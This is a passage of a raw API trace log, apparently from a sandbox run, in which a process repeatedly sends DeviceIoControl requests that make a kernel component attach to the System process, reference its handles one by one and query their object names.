lpOverlapped=0x0) returned 0 [0258.105] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.105] PsAcquireProcessExitSynchronization () returned 0x0 [0258.105] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.105] ObReferenceObjectByHandle (in: Handle=0xffffffff80000960, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.105] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.105] PsReleaseProcessExitSynchronization () returned 0x2 [0258.105] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa16 [0258.105] IoCompleteRequest () returned 0x0 [0258.106] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x7e, lpOverlapped=0x0) returned 1 [0258.106] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.106] PsAcquireProcessExitSynchronization () returned 0x0 [0258.106] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.106] ObReferenceObjectByHandle (in: Handle=0xffffffff80000994, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000691c6630, HandleInformation=0x0) returned 0x0 [0258.106] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.106] PsReleaseProcessExitSynchronization () returned 0x2 [0258.106] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa15 [0258.106] ObQueryNameString (in: Object=0xffffe000691c6630, ObjectNameInfo=0xffffe0006a816044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a816044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.106] ObfDereferenceObject (Object=0xffffe000691c6630) returned 0x8000 [0258.106] IoCompleteRequest () returned 0x0 [0258.106] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0xc0, lpOverlapped=0x0) returned 1 [0258.106] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.106] PsAcquireProcessExitSynchronization () returned 0x0 [0258.106] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.106] ObReferenceObjectByHandle (in: Handle=0xffffffff8000099c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069dbc480, HandleInformation=0x0) returned 0x0 [0258.106] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.106] PsReleaseProcessExitSynchronization () returned 0x2 [0258.106] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa14 [0258.106] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe000684197c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe000684197c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0258.106] ObfDereferenceObject (Object=0xffffe00069dbc480) returned 0x8019 [0258.106] IoCompleteRequest () returned 0x0 [0258.106] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x2c, lpOverlapped=0x0) returned 1 [0258.106] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.106] PsAcquireProcessExitSynchronization () returned 0x0 [0258.106] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.106] ObReferenceObjectByHandle (in: Handle=0xffffffff800009c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069aebea0, HandleInformation=0x0) returned 0x0 [0258.106] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.106] PsReleaseProcessExitSynchronization () returned 0x2 [0258.106] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa13 [0258.106] ObQueryNameString (in: Object=0xffffe00069aebea0, ObjectNameInfo=0xffffe0006a2a6044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a2a6044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.106] ObfDereferenceObject (Object=0xffffe00069aebea0) returned 0x8000 [0258.106] IoCompleteRequest () returned 0x0 [0258.106] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x90, lpOverlapped=0x0) returned 1 [0258.106] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.107] PsAcquireProcessExitSynchronization () returned 0x0 [0258.107] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.107] ObReferenceObjectByHandle (in: Handle=0xffffffff800009c4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000698fb330, HandleInformation=0x0) returned 0x0 [0258.107] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.107] PsReleaseProcessExitSynchronization () returned 0x2 [0258.107] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa12 [0258.107] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006840f7c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006840f7c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0258.107] ObfDereferenceObject (Object=0xffffe000698fb330) returned 0x7ffc [0258.107] IoCompleteRequest () returned 0x0 [0258.107] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x20, lpOverlapped=0x0) returned 1 [0258.107] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.107] PsAcquireProcessExitSynchronization () returned 0x0 [0258.107] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.107] ObReferenceObjectByHandle (in: Handle=0xffffffff800009f0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069320910, HandleInformation=0x0) returned 0x0 [0258.107] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.107] PsReleaseProcessExitSynchronization () returned 0x2 [0258.107] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa11 [0258.107] ObQueryNameString (in: Object=0xffffe00069320910, ObjectNameInfo=0xffffe0006a7aa7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a7aa7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.107] ObfDereferenceObject (Object=0xffffe00069320910) returned 0x8000 [0258.107] IoCompleteRequest () returned 0x0 [0258.107] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x20, lpOverlapped=0x0) returned 1 [0258.107] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.107] PsAcquireProcessExitSynchronization () returned 0x0 [0258.107] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.107] ObReferenceObjectByHandle (in: Handle=0xffffffff800009f8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006931f2d0, HandleInformation=0x0) returned 0x0 [0258.107] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.107] PsReleaseProcessExitSynchronization () returned 0x2 [0258.107] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa10 [0258.107] ObQueryNameString (in: Object=0xffffe0006931f2d0, ObjectNameInfo=0xffffe0006a40c7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a40c7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.107] ObfDereferenceObject (Object=0xffffe0006931f2d0) returned 0x8000 [0258.107] IoCompleteRequest () returned 0x0 [0258.107] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x20, lpOverlapped=0x0) returned 1 [0258.107] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.107] PsAcquireProcessExitSynchronization () returned 0x0 [0258.107] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.107] ObReferenceObjectByHandle (in: Handle=0xffffffff80000a00, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069321a90, HandleInformation=0x0) returned 0x0 [0258.108] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.108] PsReleaseProcessExitSynchronization () returned 0x2 [0258.108] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa0f [0258.108] ObQueryNameString (in: Object=0xffffe00069321a90, ObjectNameInfo=0xffffe0006a3b07c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3b07c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.108] ObfDereferenceObject (Object=0xffffe00069321a90) returned 0x7b68 [0258.108] IoCompleteRequest () returned 0x0 [0258.108] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x20, lpOverlapped=0x0) returned 1 [0258.108] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.108] PsAcquireProcessExitSynchronization () returned 0x0 [0258.108] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.108] ObReferenceObjectByHandle (in: Handle=0xffffffff80000a20, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a328bb0, HandleInformation=0x0) returned 0x0 [0258.108] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.108] PsReleaseProcessExitSynchronization () returned 0x2 [0258.108] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa0e [0258.108] ObQueryNameString (in: Object=0xffffe0006a328bb0, ObjectNameInfo=0xffffe0006a2cb4c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a2cb4c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.108] ObfDereferenceObject (Object=0xffffe0006a328bb0) returned 0x8000 [0258.108] IoCompleteRequest () returned 0x0 [0258.108] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x7e, lpOverlapped=0x0) returned 1 [0258.108] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.108] PsAcquireProcessExitSynchronization () returned 0x0 [0258.108] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.108] ObReferenceObjectByHandle (in: Handle=0xffffffff80000a24, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006936d1b0, HandleInformation=0x0) returned 0x0 [0258.108] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.108] PsReleaseProcessExitSynchronization () returned 0x2 [0258.108] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa0d [0258.108] ObQueryNameString (in: Object=0xffffe0006936d1b0, ObjectNameInfo=0xffffe0006a6c07c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a6c07c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.108] ObfDereferenceObject (Object=0xffffe0006936d1b0) returned 0x7fff [0258.108] IoCompleteRequest () returned 0x0 [0258.108] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpOutBuffer=0x315480, lpBytesReturned=0x14d450, lpOverlapped=0x0) returned 0 [0258.108] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.108] PsAcquireProcessExitSynchronization () returned 0x0 [0258.108] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.108] ObReferenceObjectByHandle (in: Handle=0xffffffff80000a28, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.108] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.108] PsReleaseProcessExitSynchronization () returned 0x2 [0258.108] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa0c [0258.108] IoCompleteRequest () returned 0x0 [0258.109] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x7e, lpOverlapped=0x0) returned 1 [0258.109] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.109] PsAcquireProcessExitSynchronization () returned 0x0 [0258.109] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.109] ObReferenceObjectByHandle (in: Handle=0xffffffff80000a34, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006927df20, HandleInformation=0x0) returned 0x0 [0258.109] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.109] PsReleaseProcessExitSynchronization () returned 0x2 [0258.109] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa0b [0258.109] ObQueryNameString (in: Object=0xffffe0006927df20, ObjectNameInfo=0xffffe0006a3277c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3277c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.109] ObfDereferenceObject (Object=0xffffe0006927df20) returned 0x7f02 [0258.109] IoCompleteRequest () returned 0x0 [0258.109] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x20, lpOverlapped=0x0) returned 1 [0258.109] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.109] PsAcquireProcessExitSynchronization () returned 0x0 [0258.109] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.109] ObReferenceObjectByHandle (in: Handle=0xffffffff80000a38, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a3e3f20, HandleInformation=0x0) returned 0x0 [0258.109] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.109] PsReleaseProcessExitSynchronization () returned 0x2 [0258.109] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa0a [0258.109] ObQueryNameString (in: Object=0xffffe0006a3e3f20, ObjectNameInfo=0xffffe000691a47c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000691a47c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.109] ObfDereferenceObject (Object=0xffffe0006a3e3f20) returned 0x8000 [0258.109] IoCompleteRequest () returned 0x0 [0258.109] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpOutBuffer=0x315480, lpBytesReturned=0x14d450, lpOverlapped=0x0) returned 0 [0258.109] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.109] PsAcquireProcessExitSynchronization () returned 0x0 [0258.109] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.109] ObReferenceObjectByHandle (in: Handle=0xffffffff80000a3c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.109] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.109] PsReleaseProcessExitSynchronization () returned 0x2 [0258.109] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa09 [0258.109] IoCompleteRequest () returned 0x0 [0258.109] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x14, lpOverlapped=0x0) returned 1 [0258.109] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.109] PsAcquireProcessExitSynchronization () returned 0x0 [0258.109] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.110] ObReferenceObjectByHandle (in: Handle=0xffffffff80000a44, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00079221490, HandleInformation=0x0) returned 0x0 [0258.110] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.110] PsReleaseProcessExitSynchronization () returned 0x2 [0258.110] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa08 [0258.110] ObQueryNameString (in: Object=0xffffe00079221490, ObjectNameInfo=0xffffe0006a5164c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a5164c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.110] ObfDereferenceObject (Object=0xffffe00079221490) returned 0x7fff [0258.110] IoCompleteRequest () returned 0x0 [0258.110] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpOutBuffer=0x315480, lpBytesReturned=0x14d450, lpOverlapped=0x0) returned 0 [0258.110] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.110] PsAcquireProcessExitSynchronization () returned 0x0 [0258.110] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.110] ObReferenceObjectByHandle (in: Handle=0xffffffff80000a48, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.110] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.110] PsReleaseProcessExitSynchronization () returned 0x2 [0258.110] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa07 [0258.110] IoCompleteRequest () returned 0x0 [0258.110] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x14, lpOverlapped=0x0) returned 1 [0258.110] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.110] PsAcquireProcessExitSynchronization () returned 0x0 [0258.110] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.110] ObReferenceObjectByHandle (in: Handle=0xffffffff80000a4c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0007cdf3a40, HandleInformation=0x0) returned 0x0 [0258.110] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.110] PsReleaseProcessExitSynchronization () returned 0x2 [0258.110] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa06 [0258.110] ObQueryNameString (in: Object=0xffffe0007cdf3a40, ObjectNameInfo=0xffffe000699427c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000699427c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.110] ObfDereferenceObject (Object=0xffffe0007cdf3a40) returned 0x8000 [0258.110] IoCompleteRequest () returned 0x0 [0258.110] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpOutBuffer=0x315480, lpBytesReturned=0x14d450, lpOverlapped=0x0) returned 0 [0258.110] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.110] PsAcquireProcessExitSynchronization () returned 0x0 [0258.110] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.110] ObReferenceObjectByHandle (in: Handle=0xffffffff80000a6c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.110] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.110] PsReleaseProcessExitSynchronization () returned 0x2 [0258.110] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa05 [0258.110] IoCompleteRequest () returned 0x0 [0258.111] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpOutBuffer=0x315480, lpBytesReturned=0x14d450, lpOverlapped=0x0) returned 0 [0258.111] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.111] PsAcquireProcessExitSynchronization () returned 0x0 [0258.111] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.111] ObReferenceObjectByHandle (in: Handle=0xffffffff80000a70, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.111] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.111] PsReleaseProcessExitSynchronization () returned 0x2 [0258.111] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa04 [0258.111] IoCompleteRequest () returned 0x0 [0258.111] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x50, lpOverlapped=0x0) returned 1 [0258.111] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.111] PsAcquireProcessExitSynchronization () returned 0x0 [0258.111] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, 